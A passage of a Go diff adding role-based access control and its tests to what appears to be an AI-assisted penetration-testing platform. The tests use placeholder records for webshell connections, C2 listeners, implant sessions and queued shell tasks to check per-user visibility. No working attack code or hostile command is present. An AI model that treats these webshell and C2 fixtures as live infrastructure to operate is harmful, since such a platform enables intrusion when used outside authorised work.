"c2_listeners"}, + } + detected := make(map[string]string, len(uniqueIDs)) + for _, resourceID := range uniqueIDs { + for _, pair := range typeTablePairs { + var exists int + if err := tx.QueryRow(`SELECT COUNT(*) FROM `+pair.table+` WHERE id = ?`, resourceID).Scan(&exists); err != nil { + return 0, nil, err + } + if exists > 0 { + if previous := detected[resourceID]; previous != "" { + return 0, nil, fmt.Errorf("资源 ID 同时匹配多个类型: %s (%s, %s)", resourceID, previous, pair.resourceType) + } + detected[resourceID] = pair.resourceType + } + } + if detected[resourceID] == "" { + return 0, nil, fmt.Errorf("资源不存在: %s", resourceID) + } + } + + var created int64 + for _, resourceID := range uniqueIDs { + result, err := tx.Exec(` + INSERT OR IGNORE INTO rbac_resource_assignments (id, user_id, resource_type, resource_id, created_at) + VALUES (?, ?, ?, ?, ?) + `, uuid.NewString(), userID, detected[resourceID], resourceID, time.Now()) + if err != nil { + return 0, nil, err + } + if n, err := result.RowsAffected(); err == nil { + created += n + } + } + if err := tx.Commit(); err != nil { + return 0, nil, err + } + return created, detected, nil +} + +func (db *DB) ListRBACUsers() ([]RBACUser, error) { + rows, err := db.Query(`SELECT id, username, display_name, password_hash, enabled, is_builtin, created_at, updated_at FROM rbac_users ORDER BY username ASC`) + if err != nil { + return nil, err + } + defer rows.Close() + var out []RBACUser + for rows.Next() { + var u RBACUser + var enabled, builtin int + var createdAt, updatedAt string + if err := rows.Scan(&u.ID, &u.Username, &u.DisplayName, &u.PasswordHash, &enabled, &builtin, &createdAt, &updatedAt); err != nil { + return nil, err + } + u.Enabled = enabled != 0 + u.IsBuiltin = builtin != 0 + u.CreatedAt = parseDBTime(createdAt) + u.UpdatedAt = parseDBTime(updatedAt) + out = append(out, u) + } + return out, rows.Err() +} + +func (db *DB) ListRBACRoles() ([]RBACRole, error) { + rows, err := db.Query(`SELECT id, name, description, scope, is_system, created_at, updated_at FROM rbac_roles ORDER BY is_system DESC, name ASC`) + if err != nil { + return nil, err + } + defer rows.Close() + var out []RBACRole + for rows.Next() { + var r RBACRole + var system int + var createdAt, updatedAt string + if err := rows.Scan(&r.ID, &r.Name, &r.Description, &r.Scope, &system, &createdAt, &updatedAt); err != nil { + return nil, err + } + r.IsSystem = system != 0 + r.CreatedAt = parseDBTime(createdAt) + r.UpdatedAt = parseDBTime(updatedAt) + out = append(out, r) + } + return out, rows.Err() +} + +func (db *DB) GetRBACRoleByID(id string) (*RBACRole, error) { + id = strings.TrimSpace(id) + if id == "" { + return nil, sql.ErrNoRows + } + var r RBACRole + var system int + var createdAt, updatedAt string + err := db.QueryRow(`SELECT id, name, description, scope, is_system, created_at, updated_at FROM rbac_roles WHERE id = ?`, id). + Scan(&r.ID, &r.Name, &r.Description, &r.Scope, &system, &createdAt, &updatedAt) + if err != nil { + return nil, err + } + r.IsSystem = system != 0 + r.CreatedAt = parseDBTime(createdAt) + r.UpdatedAt = parseDBTime(updatedAt) + return &r, nil +} + +func (db *DB) UpsertRBACRole(id, name, description, scope string, permissionKeys []string) (*RBACRole, error) { + id = strings.TrimSpace(id) + name = strings.TrimSpace(name) + scope = strings.TrimSpace(scope) + if name == "" { + return nil, errors.New("role name is required") + } + if scope != RBACScopeAll && scope != RBACScopeAssigned && scope != RBACScopeOwn { + scope = RBACScopeAssigned + } + if id == "" { + id = uuid.NewString() + } + now := time.Now() + tx, err := db.Begin() + if err != nil { + return nil, err + } + defer func() { _ = tx.Rollback() }() + var isSystem int + _ = tx.QueryRow(`SELECT is_system FROM rbac_roles WHERE id = ?`, id).Scan(&isSystem) + if _, err := tx.Exec(` + INSERT INTO rbac_roles (id, name, description, scope, is_system, created_at, updated_at) + VALUES (?, ?, ?, ?, 0, ?, ?) + ON CONFLICT(id) DO UPDATE SET + name = excluded.name, + description = excluded.description, + scope = excluded.scope, + updated_at = excluded.updated_at + `, id, name, strings.TrimSpace(description), scope, now, now); err != nil { + return nil, err + } + if _, err := tx.Exec(`DELETE FROM rbac_role_permissions WHERE role_id = ?`, id); err != nil { + return nil, err + } + for _, key := range permissionKeys { + key = strings.TrimSpace(key) + if key == "" { + continue + } + var permissionExists int + if err := tx.QueryRow(`SELECT COUNT(*) FROM rbac_permissions WHERE key = ?`, key).Scan(&permissionExists); err != nil { + return nil, err + } + if permissionExists == 0 { + return nil, fmt.Errorf("unknown permission: %s", key) + } + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_role_permissions (role_id, permission_key, created_at) VALUES (?, ?, ?)`, id, key, now); err != nil { + return nil, err + } + } + if err := tx.Commit(); err != nil { + return nil, err + } + return db.GetRBACRoleByID(id) +} + +func (db *DB) DeleteRBACRole(id string) error { + id = strings.TrimSpace(id) + if id == "" { + return errors.New("role id is required") + } + if id == RBACSystemRoleAdmin || id == RBACSystemRoleOperator || id == RBACSystemRoleAuditor || id == RBACSystemRoleViewer { + return errors.New("system role cannot be deleted") + } + _, err := db.Exec(`DELETE FROM rbac_roles WHERE id = ? AND is_system = 0`, id) + return err +} + +func (db *DB) UpdateRBACUserPassword(userID, passwordHash string) error { + userID = strings.TrimSpace(userID) + passwordHash = strings.TrimSpace(passwordHash) + if userID == "" || passwordHash == "" { + return errors.New("user_id and password_hash are required") + } + _, err := db.Exec(`UPDATE rbac_users SET password_hash = ?, updated_at = ? WHERE id = ?`, passwordHash, time.Now(), userID) + return err +} + +func (db *DB) UpdateRBACAdminPassword(passwordHash string) error { + return db.UpdateRBACUserPassword("admin", passwordHash) +} + +func (db *DB) CreateRBACUser(username, displayName, passwordHash string, enabled bool, roleIDs []string) (*RBACUser, error) { + username = strings.TrimSpace(strings.ToLower(username)) + if username == "" || passwordHash == "" { + return nil, errors.New("username and password are required") + } + id := uuid.NewString() + now := time.Now() + tx, err := db.Begin() + if err != nil { + return nil, err + } + defer func() { _ = tx.Rollback() }() + if _, err := tx.Exec(` + INSERT INTO rbac_users (id, username, display_name, password_hash, enabled, is_builtin, created_at, updated_at) + VALUES (?, ?, ?, ?, ?, 0, ?, ?) + `, id, username, strings.TrimSpace(displayName), passwordHash, boolToInt(enabled), now, now); err != nil { + return nil, err + } + for _, roleID := range roleIDs { + roleID = strings.TrimSpace(roleID) + if roleID == "" { + continue + } + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_user_roles (user_id, role_id, created_at) VALUES (?, ?, ?)`, id, roleID, now); err != nil { + return nil, err + } + } + if err := tx.Commit(); err != nil { + return nil, err + } + return db.GetRBACUserByID(id) +} + +func (db *DB) UpdateRBACUser(userID, displayName string, enabled *bool, roleIDs *[]string) error { + userID = strings.TrimSpace(userID) + if userID == "" { + return errors.New("user_id is required") + } + tx, err := db.Begin() + if err != nil { + return err + } + defer func() { _ = tx.Rollback() }() + if enabled != nil { + if _, err := tx.Exec(`UPDATE rbac_users SET display_name = ?, enabled = ?, updated_at = ? WHERE id = ?`, strings.TrimSpace(displayName), boolToInt(*enabled), time.Now(), userID); err != nil { + return err + } + } else { + if _, err := tx.Exec(`UPDATE rbac_users SET display_name = ?, updated_at = ? WHERE id = ?`, strings.TrimSpace(displayName), time.Now(), userID); err != nil { + return err + } + } + if roleIDs != nil { + if _, err := tx.Exec(`DELETE FROM rbac_user_roles WHERE user_id = ?`, userID); err != nil { + return err + } + for _, roleID := range *roleIDs { + roleID = strings.TrimSpace(roleID) + if roleID == "" { + continue + } + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_user_roles (user_id, role_id, created_at) VALUES (?, ?, ?)`, userID, roleID, time.Now()); err != nil { + return err + } + } + } + return tx.Commit() +} + +func (db *DB) DeleteRBACUser(userID string) error { + userID = strings.TrimSpace(userID) + if userID == "" || userID == "admin" { + return errors.New("cannot delete this user") + } + _, err := db.Exec(`DELETE FROM rbac_users WHERE id = ? AND is_builtin = 0`, userID) + return err +} + +func (db *DB) ListRBACUserRoleIDs(userID string) ([]string, error) { + rows, err := db.Query(`SELECT role_id FROM rbac_user_roles WHERE user_id = ? ORDER BY role_id ASC`, userID) + if err != nil { + return nil, err + } + defer rows.Close() + var out []string + for rows.Next() { + var id string + if err := rows.Scan(&id); err != nil { + return nil, err + } + out = append(out, id) + } + return out, rows.Err() +} + +func (db *DB) ListRBACRolePermissionKeys(roleID string) ([]string, error) { + rows, err := db.Query(`SELECT permission_key FROM rbac_role_permissions WHERE role_id = ? ORDER BY permission_key ASC`, roleID) + if err != nil { + return nil, err + } + defer rows.Close() + var out []string + for rows.Next() { + var key string + if err := rows.Scan(&key); err != nil { + return nil, err + } + out = append(out, key) + } + return out, rows.Err() +} + +func (db *DB) ListRBACResourceAssignments(userID string) ([]RBACResourceAssignment, error) { + query := `SELECT id, user_id, resource_type, resource_id, created_at FROM rbac_resource_assignments WHERE 1=1` + args := []interface{}{} + if strings.TrimSpace(userID) != "" { + query += ` AND user_id = ?` + args = append(args, strings.TrimSpace(userID)) + } + query += ` ORDER BY created_at DESC` + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + var out []RBACResourceAssignment + for rows.Next() { + var row RBACResourceAssignment + var createdAt string + if err := rows.Scan(&row.ID, &row.UserID, &row.ResourceType, &row.ResourceID, &createdAt); err != nil { + return nil, err + } + row.CreatedAt = parseDBTime(createdAt) + out = append(out, row) + } + if err := enrichRBACAssignmentLabels(out, db.lookupRBACResourceOptionsByIDs); err != nil { + return nil, err + } + return out, rows.Err() +} + +func (db *DB) DeleteRBACResourceAssignment(id string) error { + _, err := db.DeleteRBACResourceAssignmentWithDetails(id) + return err +} + +// DeleteRBACResourceAssignmentWithDetails atomically removes an assignment and +// returns the deleted row so callers can write a complete, attributable audit +// event without racing a separate lookup against another delete. +func (db *DB) DeleteRBACResourceAssignmentWithDetails(id string) (*RBACResourceAssignment, error) { + id = strings.TrimSpace(id) + if id == "" { + return nil, errors.New("assignment id is required") + } + tx, err := db.Begin() + if err != nil { + return nil, err + } + defer tx.Rollback() + + var row RBACResourceAssignment + var createdAt string + err = tx.QueryRow(` + SELECT id, user_id, resource_type, resource_id, created_at + FROM rbac_resource_assignments + WHERE id = ? + `, id).Scan(&row.ID, &row.UserID, &row.ResourceType, &row.ResourceID, &createdAt) + if errors.Is(err, sql.ErrNoRows) { + return nil, errors.New("资源授权不存在或已撤销") + } + if err != nil { + return nil, err + } + row.CreatedAt = parseDBTime(createdAt) + + result, err := tx.Exec(`DELETE FROM rbac_resource_assignments WHERE id = ?`, id) + if err != nil { + return nil, err + } + if affected, rowsErr := result.RowsAffected(); rowsErr != nil { + return nil, rowsErr + } else if affected != 1 { + return nil, errors.New("资源授权不存在或已撤销") + } + if err := tx.Commit(); err != nil { + return nil, err + } + return &row, nil +} diff --git a/internal/database/rbac_access_test.go b/internal/database/rbac_access_test.go new file mode 100644 index 00000000..4ecef6b6 --- /dev/null +++ b/internal/database/rbac_access_test.go @@ -0,0 +1,727 @@ +package database + +import ( + "path/filepath" + "strings" + "testing" + "time" + + "cyberstrike-ai/internal/mcp" + + "go.uber.org/zap" +) + +func newRBACTestDB(t *testing.T) *DB { + t.Helper() + db, err := NewDB(filepath.Join(t.TempDir(), "rbac.db"), zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + t.Cleanup(func() { _ = db.Close() }) + return db +} + +func TestRBACToolExecutionOwnershipAccess(t *testing.T) { + db := newRBACTestDB(t) + for _, exec := range []*mcp.ToolExecution{ + {ID: "exec-u1", ToolName: "one", Status: "completed", StartTime: time.Now(), OwnerUserID: "u1"}, + {ID: "exec-u2", ToolName: "two", Status: "completed", StartTime: time.Now(), OwnerUserID: "u2"}, + {ID: "exec-legacy", ToolName: "legacy", Status: "completed", StartTime: time.Now()}, + } { + if err := db.SaveToolExecution(exec); err != nil { + t.Fatal(err) + } + } + access := RBACListAccess{UserID: "u1", Scope: RBACScopeAssigned} + rows, err := db.LoadToolExecutionListPageForAccess(0, 20, "", "", access) + if err != nil { + t.Fatal(err) + } + if len(rows) != 1 || rows[0].ID != "exec-u1" { + t.Fatalf("rows = %#v, want only exec-u1", rows) + } + summary, err := db.LoadToolStatsSummaryForAccess(10, access) + if err != nil { + t.Fatal(err) + } + if summary.Summary.TotalCalls != 1 || summary.Summary.ToolCount != 1 || len(summary.TopTools) != 1 || summary.TopTools[0].ToolName != "one" { + t.Fatalf("scoped summary = %#v", summary) + } + if !db.UserCanAccessToolExecution("u1", RBACScopeAssigned, "exec-u1") { + t.Fatal("owner could not access execution") + } + if db.UserCanAccessToolExecution("u1", RBACScopeAssigned, "exec-u2") { + t.Fatal("foreign execution was accessible") + } + if db.UserCanAccessToolExecution("u1", RBACScopeAssigned, "exec-legacy") { + t.Fatal("ownerless legacy execution did not fail closed") + } +} + +func TestRBACGroupAndUploadOwnership(t *testing.T) { + db := newRBACTestDB(t) + group1, err := db.CreateGroup("u1 group", "", "u1") + if err != nil { + t.Fatal(err) + } + group2, err := db.CreateGroup("u2 group", "", "u2") + if err != nil { + t.Fatal(err) + } + groups, err := db.ListGroupsForAccess("u1", RBACScopeAssigned) + if err != nil { + t.Fatal(err) + } + if len(groups) != 1 || groups[0].ID != group1.ID { + t.Fatalf("groups = %#v, want only %s (not %s)", groups, group1.ID, group2.ID) + } + if db.UserCanAccessGroup("u1", RBACScopeAssigned, group2.ID) { + t.Fatal("foreign group was accessible") + } + + conversation, err := db.CreateConversation("upload", ConversationCreateMeta{}) + if err != nil { + t.Fatal(err) + } + if err := db.UpsertChatUploadArtifact("2026-07-10/"+conversation.ID+"/a.txt", conversation.ID, "u1"); err != nil { + t.Fatal(err) + } + if conv, owner, ok := db.GetChatUploadArtifact("2026-07-10/" + conversation.ID + "/a.txt"); !ok || conv != conversation.ID || owner != "u1" { + t.Fatalf("artifact = conv=%q owner=%q ok=%v", conv, owner, ok) + } + if err := db.RenameChatUploadArtifactPath("2026-07-10/"+conversation.ID+"/a.txt", "2026-07-10/"+conversation.ID+"/b.txt"); err != nil { + t.Fatal(err) + } + if _, _, ok := db.GetChatUploadArtifact("2026-07-10/" + conversation.ID + "/b.txt"); !ok { + t.Fatal("renamed artifact metadata missing") + } +} + +func TestSystemRoleBootstrapDoesNotLeakManagementReadPermissions(t *testing.T) { + db := newRBACTestDB(t) + catalog := map[string]string{ + "auth:self": "self", "project:read": "projects", "project:write": "project writes", + "agent:local-execute": "local tools", + "rbac:read": "rbac", "config:read": "config", "audit:read": "audit", "terminal:execute": "terminal", + "mcp:execute": "invoke", "mcp:write": "manage", "mcp:external:execute": "external invoke", + "workflow:execute": "run", "workflow:write": "manage definitions", "knowledge:write": "manage knowledge", + } + if err := db.BootstrapRBAC("hash", catalog); err != nil { + t.Fatal(err) + } + viewer, err := db.CreateRBACUser("viewer-policy", "Viewer", "hash", true, []string{RBACSystemRoleViewer}) + if err != nil { + t.Fatal(err) + } + viewerAccess, err := db.ResolveRBACAccess(viewer.ID) + if err != nil { + t.Fatal(err) + } + if !viewerAccess.Permissions["project:read"] || viewerAccess.Permissions["rbac:read"] || viewerAccess.Permissions["config:read"] || viewerAccess.Permissions["audit:read"] { + t.Fatalf("unexpected viewer permissions: %#v", viewerAccess.Permissions) + } + auditor, err := db.CreateRBACUser("auditor-policy", "Auditor", "hash", true, []string{RBACSystemRoleAuditor}) + if err != nil { + t.Fatal(err) + } + auditorAccess, err := db.ResolveRBACAccess(auditor.ID) + if err != nil { + t.Fatal(err) + } + if !auditorAccess.Permissions["audit:read"] || auditorAccess.Permissions["config:read"] || auditorAccess.Permissions["rbac:read"] { + t.Fatalf("unexpected auditor permissions: %#v", auditorAccess.Permissions) + } + operator, err := db.CreateRBACUser("operator-policy", "Operator", "hash", true, []string{RBACSystemRoleOperator}) + if err != nil { + t.Fatal(err) + } + operatorAccess, err := db.ResolveRBACAccess(operator.ID) + if err != nil { + t.Fatal(err) + } + if !operatorAccess.Permissions["mcp:execute"] || operatorAccess.Permissions["mcp:write"] || operatorAccess.Permissions["mcp:external:execute"] { + t.Fatalf("unexpected operator MCP permissions: %#v", operatorAccess.Permissions) + } + if !operatorAccess.Permissions["workflow:execute"] || operatorAccess.Permissions["workflow:write"] || operatorAccess.Permissions["knowledge:write"] { + t.Fatalf("operator received global definition mutation permissions: %#v", operatorAccess.Permissions) + } + if !operatorAccess.Permissions["agent:local-execute"] { + t.Fatalf("operator is missing explicit local tool permission: %#v", operatorAccess.Permissions) + } +} + +func TestPermissionScopeDoesNotWidenAcrossUnrelatedRoles(t *testing.T) { + db := newRBACTestDB(t) + catalog := map[string]string{"auth:self": "self", "project:read": "read", "project:write": "write", "audit:read": "audit"} + if err := db.BootstrapRBAC("hash", catalog); err != nil { + t.Fatal(err) + } + ownWrite, err := db.UpsertRBACRole("", "own-writer", "", RBACScopeOwn, []string{"project:write"}) + if err != nil { + t.Fatal(err) + } + user, err := db.CreateRBACUser("mixed-scope", "Mixed", "hash", true, []string{RBACSystemRoleAuditor, ownWrite.ID}) + if err != nil { + t.Fatal(err) + } + access, err := db.ResolveRBACAccess(user.ID) + if err != nil { + t.Fatal(err) + } + if access.Scope != RBACScopeAll { + t.Fatalf("compatibility scope = %q, want all", access.Scope) + } + if got := access.PermissionScopes["project:read"]; got != RBACScopeAll { + t.Fatalf("project:read scope = %q, want all", got) + } + if got := access.PermissionScopes["project:write"]; got != RBACScopeOwn { + t.Fatalf("project:write scope widened to %q, want own", got) + } +} + +func TestRoleRejectsUnknownPermission(t *testing.T) { + db := newRBACTestDB(t) + if err := db.BootstrapRBAC("hash", map[string]string{"auth:self": "self"}); err != nil { + t.Fatal(err) + } + if _, err := db.UpsertRBACRole("", "future-role", "", RBACScopeAssigned, []string{"future:permission"}); err == nil { + t.Fatal("unknown permission was persisted") + } + if _, err := db.Exec(`INSERT INTO rbac_permissions (key, description, created_at) VALUES ('stale:permission', '', ?)`, time.Now()); err != nil { + t.Fatal(err) + } + if err := db.BootstrapRBAC("hash", map[string]string{"auth:self": "self"}); err != nil { + t.Fatal(err) + } + var count int + if err := db.QueryRow(`SELECT COUNT(*) FROM rbac_permissions WHERE key = 'stale:permission'`).Scan(&count); err != nil || count != 0 { + t.Fatalf("stale permission survived bootstrap: count=%d err=%v", count, err) + } +} + +func TestRBACProjectAndConversationListAccess(t *testing.T) { + db := newRBACTestDB(t) + p1, _ := db.CreateProject(&Project{Name: "visible"}) + p2, _ := db.CreateProject(&Project{Name: "hidden"}) + if err := db.SetResourceOwner("project", p1.ID, "u1"); err != nil { + t.Fatal(err) + } + c1, _ := db.CreateConversation("visible conv", ConversationCreateMeta{ProjectID: p1.ID}) + c2, _ := db.CreateConversation("hidden conv", ConversationCreateMeta{ProjectID: p2.ID}) + _ = db.SetResourceOwner("conversation", c1.ID, "u1") + _ = db.SetResourceOwner("conversation", c2.ID, "u2") + + projects, err := db.ListProjectsForAccess("", "", 50, 0, "u1", RBACScopeOwn) + if err != nil { + t.Fatal(err) + } + if len(projects) != 1 || projects[0].ID != p1.ID { + t.Fatalf("projects = %#v, want only %s", projects, p1.ID) + } + + convs, err := db.ListConversationsForAccess(50, 0, "", "", "", "u1", RBACScopeOwn) + if err != nil { + t.Fatal(err) + } + if len(convs) != 1 || convs[0].ID != c1.ID { + t.Fatalf("conversations = %#v, want only %s", convs, c1.ID) + } +} + +func TestRBACVulnerabilityAccessInheritsProject(t *testing.T) { + db := newRBACTestDB(t) + user, err := db.CreateRBACUser("u1", "User 1", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + p1, _ := db.CreateProject(&Project{Name: "visible"}) + p2, _ := db.CreateProject(&Project{Name: "hidden"}) + if err := db.AssignResourceToUser(user.ID, "project", p1.ID); err != nil { + t.Fatal(err) + } + v1, _ := db.CreateVulnerability(&Vulnerability{ProjectID: p1.ID, Title: "v1", Severity: "high"}) + v2, _ := db.CreateVulnerability(&Vulnerability{ProjectID: p2.ID, Title: "v2", Severity: "high"}) + + items, err := db.ListVulnerabilitiesForAccess(50, 0, VulnerabilityListFilter{}, RBACListAccess{UserID: user.ID, Scope: RBACScopeAssigned}) + if err != nil { + t.Fatal(err) + } + if len(items) != 1 || items[0].ID != v1.ID { + t.Fatalf("vulnerabilities = %#v, want only %s; hidden %s", items, v1.ID, v2.ID) + } + if !db.UserCanAccessResource(user.ID, RBACScopeAssigned, "vulnerability", v1.ID) { + t.Fatalf("expected project assignment to allow vulnerability detail") + } + if db.UserCanAccessResource(user.ID, RBACScopeAssigned, "vulnerability", v2.ID) { + t.Fatalf("unexpected access to hidden vulnerability") + } +} + +func TestRBACConversationAccessInheritsProject(t *testing.T) { + db := newRBACTestDB(t) + user, err := db.CreateRBACUser("project-member", "Project Member", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + project, err := db.CreateProject(&Project{Name: "assigned project"}) + if err != nil { + t.Fatal(err) + } + conversation, err := db.CreateConversation("project conversation", ConversationCreateMeta{ProjectID: project.ID}) + if err != nil { + t.Fatal(err) + } + if err := db.AssignResourceToUser(user.ID, "project", project.ID); err != nil { + t.Fatal(err) + } + + rows, err := db.ListConversationsForAccess(50, 0, "", "", "", user.ID, RBACScopeAssigned) + if err != nil { + t.Fatal(err) + } + if len(rows) != 1 || rows[0].ID != conversation.ID { + t.Fatalf("conversations = %#v, want project conversation %s", rows, conversation.ID) + } + if !db.UserCanAccessResource(user.ID, RBACScopeAssigned, "conversation", conversation.ID) { + t.Fatal("expected project assignment to allow conversation detail") + } +} + +func TestRBACBatchResourceAssignmentValidationAndAtomicity(t *testing.T) { + db := newRBACTestDB(t) + user, err := db.CreateRBACUser("batch-member", "Batch Member", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + p1, err := db.CreateProject(&Project{Name: "p1"}) + if err != nil { + t.Fatal(err) + } + p2, err := db.CreateProject(&Project{Name: "p2"}) + if err != nil { + t.Fatal(err) + } + p3, err := db.CreateProject(&Project{Name: "p3"}) + if err != nil { + t.Fatal(err) + } + options, err := db.ListAssignableRBACResources("project", "p1", 50) + if err != nil { + t.Fatal(err) + } + if len(options) != 1 || options[0].ID != p1.ID || options[0].Label != "p1" { + t.Fatalf("resource options = %#v, want p1", options) + } + firstPage, err := db.ListAssignableRBACResourcesPage("project", "", 2, 0) + if err != nil { + t.Fatal(err) + } + secondPage, err := db.ListAssignableRBACResourcesPage("project", "", 2, 2) + if err != nil { + t.Fatal(err) + } + if len(firstPage) != 2 || len(secondPage) != 1 { + t.Fatalf("paged resource options = %d + %d, want 2 + 1", len(firstPage), len(secondPage)) + } + seen := map[string]bool{} + for _, option := range append(firstPage, secondPage...) { + seen[option.ID] = true + } + if !seen[p1.ID] || !seen[p2.ID] || !seen[p3.ID] { + t.Fatalf("paged resource options missed resources: %#v", seen) + } + if _, err := db.ListAssignableRBACResources("secret_table", "", 50); err == nil { + t.Fatal("expected unsupported picker resource type to fail") + } + + if _, err := db.AssignResourcesToUser(user.ID, "unknown_type", []string{p1.ID}); err == nil { + t.Fatal("expected unsupported resource type to fail") + } + if _, err := db.AssignResourcesToUser(user.ID, "project", []string{p1.ID, "missing-project"}); err == nil { + t.Fatal("expected missing resource to fail the entire batch") + } + rows, err := db.ListRBACResourceAssignments(user.ID) + if err != nil { + t.Fatal(err) + } + if len(rows) != 0 { + t.Fatalf("partial grants persisted after failed batch: %#v", rows) + } + + created, err := db.AssignResourcesToUser(user.ID, "project", []string{p1.ID, p1.ID, p2.ID}) + if err != nil { + t.Fatal(err) + } + if created != 2 { + t.Fatalf("created = %d, want 2 unique grants", created) + } + created, err = db.AssignResourcesToUser(user.ID, "project", []string{p1.ID, p2.ID}) + if err != nil { + t.Fatal(err) + } + if created != 0 { + t.Fatalf("idempotent retry created = %d, want 0", created) + } + rows, err = db.ListRBACResourceAssignments(user.ID) + if err != nil { + t.Fatal(err) + } + if len(rows) != 2 { + t.Fatalf("assignment count = %d, want 2", len(rows)) + } +} + +func TestRBACWebshellAndBatchListAccess(t *testing.T) { + db := newRBACTestDB(t) + ws1 := WebShellConnection{ID: "ws_visible", ProjectID: "p1", URL: "http://a", Type: "php", Method: "post", CreatedAt: time.Now()} + ws2 := WebShellConnection{ID: "ws_hidden", ProjectID: "p2", URL: "http://b", Type: "php", Method: "post", CreatedAt: time.Now()} + ws3 := WebShellConnection{ID: "ws_other_project", ProjectID: "p2", URL: "http://c", Type: "php", Method: "post", CreatedAt: time.Now()} + ws4 := WebShellConnection{ID: "ws_unbound", URL: "http://d", Type: "php", Method: "post", CreatedAt: time.Now()} + if err := db.CreateWebshellConnection(&ws1); err != nil { + t.Fatal(err) + } + if err := db.CreateWebshellConnection(&ws2); err != nil { + t.Fatal(err) + } + if err := db.CreateWebshellConnection(&ws3); err != nil { + t.Fatal(err) + } + if err := db.CreateWebshellConnection(&ws4); err != nil { + t.Fatal(err) + } + _ = db.SetResourceOwner("webshell", ws1.ID, "u1") + _ = db.SetResourceOwner("webshell", ws2.ID, "u2") + _ = db.SetResourceOwner("webshell", ws3.ID, "u1") + _ = db.SetResourceOwner("webshell", ws4.ID, "u1") + webshells, err := db.ListWebshellConnectionsForAccess("u1", RBACScopeOwn, "") + if err != nil { + t.Fatal(err) + } + if len(webshells) != 3 { + t.Fatalf("webshells = %#v, want 3 owned webshells including unbound", webshells) + } + webshells, err = db.ListWebshellConnectionsForAccess("u1", RBACScopeOwn, "p1") + if err != nil { + t.Fatal(err) + } + if len(webshells) != 1 || webshells[0].ID != ws1.ID { + t.Fatalf("webshells scoped to p1 = %#v, want only %s", webshells, ws1.ID) + } + webshells, err = db.ListWebshellConnectionsForAccess("u1", RBACScopeOwn, ProjectFilterUnbound) + if err != nil { + t.Fatal(err) + } + if len(webshells) != 1 || webshells[0].ID != ws4.ID { + t.Fatalf("unbound webshells = %#v, want only %s", webshells, ws4.ID) + } + + if err := db.CreateBatchQueue("q_visible", "visible", "", "eino_single", "manual", "", nil, "", 1, []map[string]interface{}{{"id": "t1", "message": "a"}}); err != nil { + t.Fatal(err) + } + if err := db.CreateBatchQueue("q_hidden", "hidden", "", "eino_single", "manual", "", nil, "", 1, []map[string]interface{}{{"id": "t2", "message": "b"}}); err != nil { + t.Fatal(err) + } + _ = db.SetResourceOwner("batch_task", "q_visible", "u1") + _ = db.SetResourceOwner("batch_task", "q_hidden", "u2") + queues, err := db.ListBatchQueuesForAccess(50, 0, "all", "", "u1", RBACScopeOwn) + if err != nil { + t.Fatal(err) + } + if len(queues) != 1 || queues[0].ID != "q_visible" { + t.Fatalf("queues = %#v, want only q_visible", queues) + } +} + +func TestRBACC2AccessInheritsListener(t *testing.T) { + db := newRBACTestDB(t) + now := time.Now() + l1 := &C2Listener{ID: "l_visible", ProjectID: "p1", Name: "visible", Type: "http_beacon", BindHost: "127.0.0.1", BindPort: 9001, OwnerUserID: "u1", CreatedAt: now} + l2 := &C2Listener{ID: "l_hidden", ProjectID: "p2", Name: "hidden", Type: "http_beacon", BindHost: "127.0.0.1", BindPort: 9002, OwnerUserID: "u2", CreatedAt: now} + l3 := &C2Listener{ID: "l_other_project", ProjectID: "p2", Name: "other project", Type: "http_beacon", BindHost: "127.0.0.1", BindPort: 9003, OwnerUserID: "u1", CreatedAt: now} + l4 := &C2Listener{ID: "l_unbound", Name: "unbound", Type: "http_beacon", BindHost: "127.0.0.1", BindPort: 9004, OwnerUserID: "u1", CreatedAt: now} + if err := db.CreateC2Listener(l1); err != nil { + t.Fatal(err) + } + if err := db.CreateC2Listener(l2); err != nil { + t.Fatal(err) + } + if err := db.CreateC2Listener(l3); err != nil { + t.Fatal(err) + } + if err := db.CreateC2Listener(l4); err != nil { + t.Fatal(err) + } + if err := db.UpsertC2Session(&C2Session{ID: "s_visible", ListenerID: l1.ID, ImplantUUID: "implant-visible", Status: "active", FirstSeenAt: now, LastCheckIn: now}); err != nil { + t.Fatal(err) + } + if err := db.UpsertC2Session(&C2Session{ID: "s_hidden", ListenerID: l2.ID, ImplantUUID: "implant-hidden", Status: "active", FirstSeenAt: now, LastCheckIn: now}); err != nil { + t.Fatal(err) + } + if err := db.UpsertC2Session(&C2Session{ID: "s_other_project", ListenerID: l3.ID, ImplantUUID: "implant-other-project", Status: "active", FirstSeenAt: now, LastCheckIn: now}); err != nil { + t.Fatal(err) + } + if err := db.UpsertC2Session(&C2Session{ID: "s_unbound", ListenerID: l4.ID, ImplantUUID: "implant-unbound", Status: "active", FirstSeenAt: now, LastCheckIn: now}); err != nil { + t.Fatal(err) + } + if err := db.CreateC2Task(&C2Task{ID: "t_visible", SessionID: "s_visible", TaskType: "shell", Status: "queued", CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.CreateC2Task(&C2Task{ID: "t_hidden", SessionID: "s_hidden", TaskType: "shell", Status: "queued", CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.CreateC2Task(&C2Task{ID: "t_other_project", SessionID: "s_other_project", TaskType: "shell", Status: "queued", CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.CreateC2Task(&C2Task{ID: "t_unbound", SessionID: "s_unbound", TaskType: "shell", Status: "queued", CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.AppendC2Event(&C2Event{ID: "e_visible", Level: "info", Category: "task", SessionID: "s_visible", TaskID: "t_visible", Message: "visible", CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.AppendC2Event(&C2Event{ID: "e_hidden", Level: "info", Category: "task", SessionID: "s_hidden", TaskID: "t_hidden", Message: "hidden", CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.AppendC2Event(&C2Event{ID: "e_other_project", Level: "info", Category: "task", SessionID: "s_other_project", TaskID: "t_other_project", Message: "other project", CreatedAt: now}); err != nil { + t.Fatal(err) + } + if err := db.AppendC2Event(&C2Event{ID: "e_unbound", Level: "info", Category: "task", SessionID: "s_unbound", TaskID: "t_unbound", Message: "unbound", CreatedAt: now}); err != nil { + t.Fatal(err) + } + + 